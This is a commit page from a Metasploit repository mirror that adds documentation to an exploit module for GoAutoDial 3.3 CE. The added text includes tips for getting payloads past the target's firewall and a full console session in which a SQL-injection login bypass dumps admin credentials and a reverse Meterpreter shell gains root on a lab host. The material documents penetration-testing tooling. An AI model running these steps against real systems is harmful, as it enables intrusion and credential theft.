adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Minor doc update.

Browse Source
This commit is contained in:
Pearce Barry
2017-07-07 16:51:31 -05:00
parent 95ba5d61ce
commit e3f95954ba
1 changed files with 34 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/http/goautodial_3_rce_code_injection.md
+34
View File
@@ -7,6 +7,8 @@ This module exploits a SQL injection flaw and command injection flaw within GoAu
GoAutoDial 3.3 CE (32bit and 64bit) is available for download from goautodial.org. In order to download, register a free account then download the bootable ISOs. Both ISOs have been used for the dev of this. http://goautodial.org/attachments/download/3237/goautodial-32bit-ce-3.3-final.iso.html
Refer to: https://www.exploit-db.com/exploits/36807/
NOTE: GoAutoDial heavily restricts inbound traffic via iptables rules (and uses fail2ban, as well). This can cause bind payloads to quietly fail. For bind payloads, using ports which allow inbound connections but have no service running is ideal (ports 21 and 222 fall into this category for default GoAutoDial behavior).
## Verification
- Start `msfconsole`
@@ -19,6 +21,8 @@ Refer to: https://www.exploit-db.com/exploits/36807/
## Scenarios
### Targeting 64-bit GoAutoDial
```
msf > use exploit/linux/http/goautodial_3_rce_command_injection
msf exploit(goautodial_3_rce_command_injection) > set rhost 172.16.191.150
@@ -49,3 +53,33 @@ Architecture : x64
Meterpreter : x64/linux
```
### Targeting 32-bit GoAutoDial
```
msf > use exploit/linux/http/goautodial_3_rce_command_injection
msf exploit(goautodial_3_rce_command_injection) > set lhost 10.0.2.4
lhost => 10.0.2.4
msf exploit(goautodial_3_rce_command_injection) > set rhost 10.0.2.44
rhost => 10.0.2.44
msf exploit(goautodial_3_rce_command_injection) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(goautodial_3_rce_command_injection) > run
[*] Started reverse TCP handler on 10.0.2.4:4444
[*] 10.0.2.44:443 - Trying SQL injection...
[+] 10.0.2.44:443 - Authentication Bypass (SQLi) was successful
[*] 10.0.2.44:443 - Dumping admin password...
[+] 10.0.2.44:443 - Found credentials: admin|newpassword|Admin|||Y
[*] 10.0.2.44:443 - Sending payload...
[*] Command Stager progress - 78.66% done (796/1012 bytes)
[*] Sending stage (798104 bytes) to 10.0.2.44
[*] Meterpreter session 1 opened (10.0.2.4:4444 -> 10.0.2.44:49035) at 2017-07-07 15:49:48 -0500
[*] Command Stager progress - 100.00% done (1012/1012 bytes)
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : go.goautodial.org
OS : CentOS 5.10 (Linux 2.6.18-371.11.1.el5)
Architecture : i686
Meterpreter : x86/linux
```